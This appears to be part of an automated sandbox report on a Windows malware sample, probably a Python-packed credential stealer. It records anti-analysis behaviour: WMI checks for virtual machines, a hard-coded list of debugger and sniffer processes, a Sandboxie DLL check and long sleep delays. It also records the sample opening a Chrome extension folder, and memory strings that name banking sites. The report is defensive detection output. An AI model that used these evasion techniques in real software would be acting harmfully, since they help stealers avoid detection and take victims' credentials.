            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE0I
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE0O
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"PM
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE", # XEN
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"0W
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP@
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"P
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEPL
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D132F6 rdtsc 2_2_00007FFD93D132F6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2885
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 971
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4517
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17307
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeAPI coverage: 4.8 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2948Thread sleep count: 2885 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544Thread sleep count: 971 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 4517 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 1734 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\netsh.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B69280 FindFirstFileExW,FindClose,0_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B69280 FindFirstFileExW,FindClose,2_2_00007FF7B2B69280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7B2B683C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7B2B81874
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D13229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFDB222F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,2_2_00007FFD93D13229
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
            Source: HOSTNAME.EXE, 00000034.00000002.2218372645.000002C49D039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFFD
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe", # VirtualBox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe", # VirtualBox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeN
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe", # VMware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 'qemu'C
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe0~
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: [1VMware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"Ph
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
